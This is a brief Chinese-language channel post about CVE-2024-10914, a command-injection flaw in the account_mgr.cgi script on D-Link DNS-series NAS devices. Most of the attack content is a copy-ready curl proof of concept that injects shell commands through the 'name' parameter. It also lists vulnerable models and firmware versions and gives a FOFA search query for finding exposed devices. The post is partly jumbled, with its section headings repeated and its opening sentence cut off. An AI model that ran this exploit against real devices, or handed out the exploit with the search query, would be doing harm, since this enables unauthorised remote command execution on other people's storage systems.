【全栈工程师修炼指南】收集并发布网络种各大佬的关于开发编程、系统运维、网络安全、大数据、云原生、机器学习、以及物联网IOT方面,并通过RSS订阅让您随时随刻了解最新的信息技术,本频道是你从小白走向大佬必备站点。
📗 公众号:全栈工程师修炼指南
🌐 博客:https://weiyigeek.top
📗 公众号:全栈工程师修炼指南
🌐 博客:https://weiyigeek.top
D-Link NAS 设备中发现了一个严重漏洞 CVE-2024-10914,对全球超过 61,000 个系统构成严重风险。该漏洞是
Exploit:
Affected Devices:
Search query:
#poc
account_mgr.cgi 脚本中的命令注入漏洞,允许远程攻击者通过特制的 HTTP GET 请求执行任意命令Exploit:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
Affected Devices:
DNS-320 – Version 1.00
DNS-320LW – Version 1.01.0914.2012
DNS-325 – Versions 1.01 and 1.02
DNS-340L – Version 1.08
Search query:
FOFA: app="D_Link-DNS-ShareCenter"
#poc
